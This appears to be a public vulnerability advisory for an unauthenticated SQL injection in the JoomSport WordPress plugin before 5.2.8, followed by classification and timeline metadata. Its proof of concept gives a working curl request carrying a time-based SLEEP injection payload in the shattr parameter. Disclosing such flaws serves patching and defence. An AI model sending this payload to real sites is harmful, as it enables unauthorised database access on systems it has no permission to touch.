WordPress Plugin Vulnerabilities
JoomSport < 5.2.8 - Unauthenticated SQLi
Description
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users
Proof of Concept
1. Install the vulnerable plugin (joomsport-sports-league-results-management version 5.2.6), skip the demo data import when prompted 2. Invoke the following curl command to induce a 10 second sleep: time curl 'https://example.com/wp-admin/admin-ajax.php?action=joomsport_md_load' \ --data 'mdId=1&shattr={"id":"1+AND+(SELECT+1+FROM(SELECT+SLEEP(5))aaaa);-- -"}'
Affects Plugins
References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
cydave
Submitter
cydave
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-11-28 (about 1 years ago)
Added
2022-11-28 (about 1 years ago)
Last Updated
2022-11-28 (about 1 years ago)